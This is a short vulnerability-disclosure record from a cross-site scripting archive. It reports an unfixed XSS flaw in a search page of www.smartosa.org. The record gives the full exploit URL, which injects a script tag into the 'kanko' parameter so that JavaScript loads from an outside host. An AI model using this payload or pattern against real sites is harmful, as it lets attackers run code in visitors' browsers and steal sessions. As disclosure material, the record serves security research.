Unfixed XSS vulnerability at www.smartosa.org

2007-10-09T00:00:00
ID XSSED:16303
Type xssed
Reporter kusomiso.com
Modified 2007-12-09T00:00:00

Description

Security researcher kusomiso.com, has submitted on 10/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.smartosa.org, which at the time of submission ranked 1529209 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.smartosa.org/web/noritsugi/search.asp?errmsg=1&moku=0&kanko='%3E%22%3E%3CSCRIPT/SRC=http://kusomiso.com/xss.js%3E%3C/SCRIPT%3E'%3E%22%3E%3CSCRIPT/SRC=http://kusomiso.com/xss.js%3E%3C/SCRIPT%3E&kanko2=0&sisetsu=0&sisetsu2=0&tarminal=0&tarminal2=0&opt1=0&opt2=0&ee_name=%82%B1%82%B1%82%C9%93%FC%97%CD%82%B5%82%C4%82%AD%82%BE%82%B3%82%A2%81B